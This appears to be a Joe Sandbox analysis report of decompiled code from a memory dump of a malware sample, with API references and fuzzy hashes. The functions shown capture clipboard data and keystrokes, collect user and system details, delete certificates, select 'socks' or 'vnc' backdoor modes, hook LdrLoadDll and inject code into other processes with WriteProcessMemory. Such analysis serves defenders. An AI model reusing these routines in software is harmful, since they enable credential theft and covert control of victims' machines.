    										_t93 = L012B1AA0(_t122, 0x271f, 0, 0x20000,  &_v588);
    									}
    								}
    								goto L28;
    							}
    						}
    						L012B1A6E( &_v24);
    						_t70 = L012B1564(_t122, 0x271c, 0x20000,  &_v24, 6);
    						_t93 = _t70;
    						__eflags = _t93;
    						if(_t93 == 0) {
    							goto L31;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v8 = _t70 & 0x0000ffff;
    						_t93 = L012B1564(_t122, 0x271d, 0x20000,  &_v8, 2);
    						goto L20;
    					}
    					__eflags = _t93;
    					if(_t93 == 0) {
    						goto L31;
    					}
    					_v8 = L012B1C35();
    					_t93 = L012B1564(_t122, 0x2719, 0x20000,  &_v8, 4);
    					__eflags = _t93;
    					if(_t93 == 0) {
    						goto L31;
    					}
    					_v8 = L012B11C7();
    					_t93 = L012B1564(_t122, 0x271b, 0x20000,  &_v8, 4);
    					__eflags = _t93;
    					if(_t93 == 0) {
    						goto L31;
    					}
    					_v8 = GetTickCount();
    					_t93 = L012B1564(_t122, 0x271a, 0x20000,  &_v8, 4);
    					goto L16;
    				}
    				L012B11AE( &_v556);
    				_t93 = L012B1AA0(_t122, 0x2711, __eflags, 0x20000,  &_v552);
    				__eflags = _t93;
    				if(_t93 == 0) {
    					goto L11;
    				}
    				L012B12F3( &_v68);
    				__eflags = _v68;
    				if(__eflags != 0) {
    					_t93 = L012B1AA0(_t122, 0x2712, __eflags, 0x20000,  &_v68);
    				}
    				__eflags = _t93;
    				if(_t93 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 012C88EC
    • GetUserDefaultUILanguage.KERNEL32(00020000,?,00000006), ref: 012C893D
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 012C897E
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 012C89C3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: e9077ff661e79b5c14a2f3d4e7dab66663d1d56b58515bf0e7cf3e389e50da40
    • Instruction ID: 02755f1e2e801c410c7d822858ccab1d7c3742c87ad956cae362043138c282e8
    • Opcode Fuzzy Hash: e9077ff661e79b5c14a2f3d4e7dab66663d1d56b58515bf0e7cf3e389e50da40
    • Instruction Fuzzy Hash: 22517C30A7124AAAFB11DB6CD854BFE77F8AF56700F088159DB01AB2C0DB748E09DB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CA8EB(signed int __edx, void* _a4) {
    				void* _t11;
    				void* _t12;
    				void* _t17;
    				void* _t21;
    				signed int _t26;
    				void* _t29;
    				void* _t30;
    				int _t31;
    
    				_t26 = __edx;
    				_t31 = _a4;
    				_t29 = GetClipboardData(_t31);
    				_a4 = _t29;
    				if(L012B150A() == 0) {
    					return _t29;
    				}
    				if(_t29 == 0 || _t31 != 1 && _t31 != 0xd && _t31 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t29);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t31 - 1;
    					if(_t11 == 0) {
    						_t12 = L012B1596(_t21, _t26 | 0xffffffff);
    						L12:
    						_t30 = _t12;
    						L15:
    						if(_t30 != 0) {
    							EnterCriticalSection(0x12dd810);
    							E012CA78B(0x12d8d88);
    							E012CA78B(_t30);
    							LeaveCriticalSection(0x12dd810);
    							if(_t30 != _t21) {
    								L012B1933(_t30);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t17 = _t11 - 6;
    					if(_t17 == 0) {
    						_t12 = L012B13A2(_t21, _t26 | 0xffffffff);
    						goto L12;
    					}
    					if(_t17 != 6) {
    						_t30 = _a4;
    					} else {
    						_t30 = _t21;
    					}
    					goto L15;
    				}
    			}

    APIs
    • GetClipboardData.USER32 ref: 012CA8F4
    • GlobalLock.KERNEL32 ref: 012CA928
    • EnterCriticalSection.KERNEL32(012DD810), ref: 012CA96E
    • LeaveCriticalSection.KERNEL32(012DD810,00000000,012D8D88), ref: 012CA985
    • GlobalUnlock.KERNEL32(?), ref: 012CA999
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockUnlock
    • String ID:
    • API String ID: 1509472541-0
    • Opcode ID: 092c1b6ecd418cb3f0503cf3ca08cb2ddf54e7159a9baf1d085aa3f3b473eeb4
    • Instruction ID: 9f3ca934574d234751bf999fff2c9defbf87174365a9f0691ea258c07f58828a
    • Opcode Fuzzy Hash: 092c1b6ecd418cb3f0503cf3ca08cb2ddf54e7159a9baf1d085aa3f3b473eeb4
    • Instruction Fuzzy Hash: 9A11EB3A93010F675B222A7DE9CA5FD3B55AEC5E6031B432DFB1B97144FE7089058351
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012BD399(WCHAR* __ecx, void* __eflags) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				WCHAR* _t35;
    				void* _t37;
    
    				_t35 = __ecx;
    				if(L012B1203( &_v524, __ecx, "*") == 0) {
    					L10:
    					SetFileAttributesW(_t35, 0x80);
    					return RemoveDirectoryW(_t35) & 0xffffff00 | _t15 != 0x00000000;
    				}
    				_t37 = FindFirstFileW( &_v524,  &_v1116);
    				if(_t37 == 0xffffffff) {
    					L9:
    					goto L10;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(L012B13A7( &(_v1116.cFileName)) == 0 && L012B1203( &_v524, _t35,  &(_v1116.cFileName)) != 0) {
    						_t44 = _v1116.dwFileAttributes & 0x00000010;
    						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
    							L012B1640( &_v524);
    						} else {
    							L012B196F( &_v524, _t44);
    						}
    					}
    				} while (FindNextFileW(_t37,  &_v1116) != 0);
    				FindClose(_t37);
    				goto L9;
    			}








    APIs
    • FindFirstFileW.KERNEL32(?,?,?,012D7424), ref: 012BD3CA
    • FindNextFileW.KERNEL32(00000000,?,?,012D7424), ref: 012BD41D
    • FindClose.KERNEL32(00000000,?,012D7424), ref: 012BD428
    • SetFileAttributesW.KERNEL32(?,00000080,012D7424), ref: 012BD435
    • RemoveDirectoryW.KERNEL32(?,?,00000080,012D7424), ref: 012BD43C
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: FileFind$AttributesCloseDirectoryFirstNextRemove
    • String ID:
    • API String ID: 937699248-0
    • Opcode ID: 310ab54116091c5b4781cf04658d6ac1481ceb7f4dfe29968730a4f6fe01d56f
    • Instruction ID: bf28ba5644ad0dd98bb480966028318ce91e1023ae342395476f4906a9dfcc7c
    • Opcode Fuzzy Hash: 310ab54116091c5b4781cf04658d6ac1481ceb7f4dfe29968730a4f6fe01d56f
    • Instruction Fuzzy Hash: 5D11C6719211295BDB20AB68ECCDBFE7B7C9F01384F0501A4EA52A3085EF346A85CB25
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 012B3967
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 012B3980
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,?,012B39C3,012D7048), ref: 012B398B
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3993
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 012B399F
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: 036f5f17c3cc299e1395013d7d334183210c4f1097f4864d6d1e12b1ccf7a2ad
    • Instruction ID: 44b7b8a8aded4fb9db35a6b8664ea9c4ce1ad540ab87cc82499c872b8795a59e
    • Opcode Fuzzy Hash: 036f5f17c3cc299e1395013d7d334183210c4f1097f4864d6d1e12b1ccf7a2ad
    • Instruction Fuzzy Hash: 0BF02032683A116BD2210769FC4CFEBBBACFF82BA1F064501F64686144AB21A800C771
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E012CA854(MSG* _a4) {
    				short _v24;
    				char _v280;
    				signed int _t23;
    				MSG* _t27;
    				void* _t28;
    
    				_t27 = _a4;
    				if(_t27 != 0 && L012B150A() != 0 && _t27->message == 0x100 && _t27->wParam != 0x1b && GetKeyboardState( &_v280) != 0) {
    					_t23 = ToUnicode(_t27->wParam, _t27->lParam & 0x000000ff,  &_v280,  &_v24, 9, 0);
    					if(_t23 > 0) {
    						if(_t23 != 1) {
    							if(__eflags > 0) {
    								goto L11;
    							} else {
    								goto L10;
    							}
    						} else {
    							if(_t27->wParam != 8) {
    								L10:
    								__eflags = _v24 - 0x20;
    								if(_v24 >= 0x20) {
    									L11:
    									__eflags = 0;
    									 *((short*)(_t28 + _t23 * 2 - 0x14)) = 0;
    									_push( &_v24);
    									goto L12;
    								}
    							} else {
    								_push(0x12d8d84);
    								L12:
    								E012CA78B();
    							}
    						}
    					}
    				}
    				return TranslateMessage(_t27);
    			}









    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: KeyboardMessageStateTranslateUnicode
    • String ID:
    • API String ID: 3638559909-3916222277
    • Opcode ID: 3513d7a5ee88c0a966000f215623705a21dbbe6beadc6a0cdb48ee2b7f449d1c
    • Instruction ID: 7a43c4197e5caa3adc12499d9ca10740ffbd65d36b4d0ed985beb8f39da39dcf
    • Opcode Fuzzy Hash: 3513d7a5ee88c0a966000f215623705a21dbbe6beadc6a0cdb48ee2b7f449d1c
    • Instruction Fuzzy Hash: DE01823192161F9BDB309A58D909BEB77A8AF10F01F04822DA706E3044F630DA469766
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E012B504C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				struct HINSTANCE__* _t4;
    				_Unknown_base(*)()* _t5;
    				void* _t8;
    				void* _t11;
    				struct HINSTANCE__* _t12;
    
    				_t11 = __edx;
    				_t8 = __ecx;
    				_t4 = LoadLibraryW(L"shell32.dll");
    				_t12 = _t4;
    				if(_t12 != 0) {
    					_t5 = GetProcAddress(_t12, 0x3d);
    					if(_t5 != 0) {
    						 *_t5(_t8, 0, _t11, _a4, _a8, _a12);
    					}
    					return FreeLibrary(_t12);
    				}
    				return _t4;
    			}









    APIs
    • LoadLibraryW.KERNEL32(shell32.dll), ref: 012B505B
    • GetProcAddress.KERNEL32(00000000,0000003D), ref: 012B506A
    • FreeLibrary.KERNEL32(00000000), ref: 012B5084
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: shell32.dll
    • API String ID: 145871493-3366042328
    • Opcode ID: 44a29963fcdf41512ee53de04ce1494a37be571dc54f72ece307b737cf2a9e88
    • Instruction ID: 089d9ed0fd0913de06b8481c275cd7ca14ab1daa5ec19559c490dc884c10d360
    • Opcode Fuzzy Hash: 44a29963fcdf41512ee53de04ce1494a37be571dc54f72ece307b737cf2a9e88
    • Instruction Fuzzy Hash: E5E09232602215BBD7321A6AFC48FDF7F1CEF89BA1F054915FB0499100CA35C91087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B30C0(CHAR** _a4) {
    				signed int _v8;
    				CHAR** _v12;
    				char _v276;
    				signed short _v280;
    				char _v284;
    				signed int _v285;
    				signed short _v292;
    				void* _v300;
    				char _v784;
    				char _v788;
    				CHAR*** _v792;
    				signed char _v796;
    				signed short _v798;
    				char _v800;
    				CHAR*** _v804;
    				void* _t68;
    
    				L012B1654(_t68);
    				_v12 = _a4;
    				L012B144C( &_v276);
    				_v8 = 0;
    				_t144 =  *_v12;
    				if(lstrcmpiA( *_v12, ?str?) != 0) {
    					if(lstrcmpiA( *_v12, ?str?) != 0) {
    						_t144 = 0;
    						_v280 = L012B134D( *_v12, 0);
    						if(_v280 > 0 && _v280 < 0xffff) {
    							_v8 = _v280 & 0x0000ffff;
    						}
    					} else {
    						_v8 = 0xfffffffe;
    					}
    				} else {
    					_v8 = 0xffffffff;
    				}
    				if(_v8 == 0) {
    					L22:
    					L012B1343( &_v276, _t144 | 0xffffffff);
    					L012B141A( &_v276);
    					L012B1933( *_v12);
    					L012B1933(_v12[1]);
    					L012B1933(_v12[2]);
    					L012B1492(_v12[3]);
    					L012B1933(_v12);
    					return 0;
    				}
    				_t144 = L012B134D(_v12[2], 0);
    				_v284 = L012B13C0(_v12[1], _t87);
    				if(_v284 == 0xffffffff) {
    					goto L22;
    				}
    				L012B17B2(_v284, 1);
    				L012B1122(_v284, 1, 0x493e0, 0x1388);
    				L012B11AE( &_v788);
    				_t144 =  &_v300 | 0xffffffff;
    				_v285 = L012B169A( &_v784,  &_v300 | 0xffffffff,  &_v300);
    				if((_v285 & 0x000000ff) != 0) {
    					_t144 = 1;
    					_v285 = L012B16A4(_v284, 1, _v300, _v292 & 0x0000ffff);
    					L012B138E( &_v300);
    				}
    				_t94 = _v285 & 0x000000ff;
    				if((_v285 & 0x000000ff) == 0) {
    					L21:
    					L012B1B22(_t94, _v284);
    					goto L22;
    				} else {
    					while(1) {
    						_t144 = 1;
    						if(L012B10C8( &_v284, 1, 0, 0, 0) != _v284) {
    							goto L21;
    						}
    						_t94 = L012B162C(_v284,  &_v800,  &_v792);
    						_t144 = _t94 & 0x000000ff;
    						if((_t94 & 0x000000ff) == 0) {
    							goto L21;
    						}
    						if((_v796 & 0x000000ff) == 2 && (_v798 & 0x0000ffff) == 4) {
    							_v804 = L012B1C17(0xc);
    							if(_v804 != 0) {
    								 *_v804 = _v12;
    								_v804[1] = _v8;
    								_v804[2] =  *_v792;
    								if((L012B125D( &_v276, 0x20000, E012B3370, _v804, 0, 0) & 0x000000ff) == 0) {
    									L012B1933(_v804);
    								}
    							}
    							L012B1848( &_v276);
    						}
    						L012B1933(_v792);
    					}
    					goto L21;
    				}
    			}




















    APIs
    • lstrcmpiA.KERNEL32(?,socks), ref: 012B30F3
    • lstrcmpiA.KERNEL32(?,vnc,?,socks), ref: 012B3111
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: lstrcmpi
    • String ID: socks$vnc
    • API String ID: 1586166983-270151703
    • Opcode ID: ab359f1529bb2c499cfa9aff0c02f9a1adf340ef0cff117f8b279d900f90b0e2
    • Instruction ID: 2f83a802553fee87de671d76110df42670eac4b8aa7ea9fc5275e753fb61be24
    • Opcode Fuzzy Hash: ab359f1529bb2c499cfa9aff0c02f9a1adf340ef0cff117f8b279d900f90b0e2
    • Instruction Fuzzy Hash: 6A714930A202299BCB29DB24D8E1BEDB7B5BF58340F1481E8D6596B2D1DB309F85CF40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B8BB3(void* __ecx, void* __edx) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				void* _v20;
    				intOrPtr _v24;
    				long _v28;
    				void* _t37;
    				intOrPtr _t42;
    				intOrPtr* _t43;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t50;
    				signed int _t53;
    				void* _t59;
    				void* _t61;
    				intOrPtr _t62;
    				void* _t65;
    				intOrPtr _t67;
    				unsigned int _t69;
    
    				_t65 = __edx;
    				_t1 = _t65 + 0x3c; // 0xd0
    				_t61 =  *_t1 + __edx;
    				_t46 =  *(_t61 + 0x50);
    				_v20 = __ecx;
    				_v28 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__edx, _t46) == 0) {
    					_t37 = VirtualAllocEx(_v20, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					if(_t37 == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = L012B142E(_t65, _t46);
    					_t50 = 0;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_v20, _v12, 0, 0x8000);
    						_v12 = _v12 & 0x00000000;
    						goto L17;
    					}
    					if( *((intOrPtr*)(_t61 + 0xa4)) <= 0) {
    						L15:
    						L012B1933(_t47);
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *((intOrPtr*)(_t61 + 0xa0));
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t62 =  *((intOrPtr*)(_t61 + 0x34));
    					_t59 = _v12 - _t62;
    					_v24 = _t65 - _t62;
    					_t43 = _t42 + _t47;
    					while( *_t43 != _t50) {
    						_t67 =  *((intOrPtr*)(_t43 + 4));
    						if(_t67 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t50 = 0;
    							continue;
    						}
    						_t69 = _t67 + 0xfffffff8 >> 1;
    						_v16 = _t50;
    						if(_t69 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t53 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							if(_t53 != 0) {
    								 *((intOrPtr*)((_t53 & 0x00000fff) +  *_t43 + _t47)) =  *((intOrPtr*)((_t53 & 0x00000fff) +  *_t43 + _t47)) + _t59 - _v24;
    							}
    							_v16 = _v16 + 1;
    						} while (_v16 < _t69);
    						goto L12;
    					}
    					_v5 = WriteProcessMemory(_v20, _v12, _t47, _v28, _t50) != 0;
    					goto L15;
    				}
    				return 0;
    			}























    APIs
    • IsBadReadPtr.KERNEL32(?,?), ref: 012B8BD2
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?), ref: 012B8BF0
    • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 012B8C84
    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?), ref: 012B8CAA
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    • Opcode ID: a7fbd5d6cb451a53824e3121c9b601128ef17471c40ee83e36f9cc53bbd8d106
    • Instruction ID: 676d2d57f034a06ed0e86a94efef02559f02d89065eac37e4ed1269d2806b583
    • Opcode Fuzzy Hash: a7fbd5d6cb451a53824e3121c9b601128ef17471c40ee83e36f9cc53bbd8d106
    • Instruction Fuzzy Hash: F731C471E2121AAFDF198FA8CC84BEEBBB9FF44341F194068E605B7290C7709950CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E012C2D9E(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				void* _t12;
    				long _t13;
    				void* _t16;
    				void* _t22;
    				UNICODE_STRING* _t23;
    				void* _t25;
    				HMODULE* _t26;
    
    				if(L012B150A() == 0) {
    					goto ( *0x12dc7c0);
    				}
    				_t26 = _a16;
    				_t23 = _a12;
    				_t12 =  *0x12dc7c4(_a4, 0, _t23, _t26, _t22, _t25, _t16);
    				_t13 = LdrLoadDll(_a4, _a8, _t23, _t26);
    				_a4 = _t13;
    				if(_t12 < 0 && _t13 >= 0 && _t26 != 0 &&  *_t26 != 0 && _t23 != 0) {
    					EnterCriticalSection(0x12dcd98);
    					if(( *0x12dcdb0 & 0x00000001) == 0 && L012B1B81( *((intOrPtr*)(_t23 + 4)),  *_t26) != 0) {
    						 *0x12dcdb0 =  *0x12dcdb0 | 0x00000001;
    					}
    					LeaveCriticalSection(0x12dcd98);
    				}
    				return _a4;
    			}











    APIs
    • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 012C2DC1
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 012C2DD1
    • EnterCriticalSection.KERNEL32(012DCD98), ref: 012C2DF5
    • LeaveCriticalSection.KERNEL32(012DCD98), ref: 012C2E1A
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoad
    • String ID:
    • API String ID: 1466281904-0
    • Opcode ID: 244f66ed0c0629096bf12def6d183dde4e3abd109180614e8489064170d3210d
    • Instruction ID: fc9e2c11e3c0d74b9f4ac63d8d4faea721de190d7190e4352b2e0e7ac721fc72
    • Opcode Fuzzy Hash: 244f66ed0c0629096bf12def6d183dde4e3abd109180614e8489064170d3210d
    • Instruction Fuzzy Hash: 68016D32A11206EBEB229E58FD48BA67F69EF54B55F04011DEF0666245DF31A821CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 012B6A5B
    • bind.WS2_32(00000000,?,-0000001D), ref: 012B6A7B
    • listen.WS2_32(00000000), ref: 012B6A87
    • closesocket.WS2_32(00000000), ref: 012B6A92
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: 5ddd9318bc1beb9cae27247ebc4d7abe6bdf830309cb65f3256c1863fd2f98ee
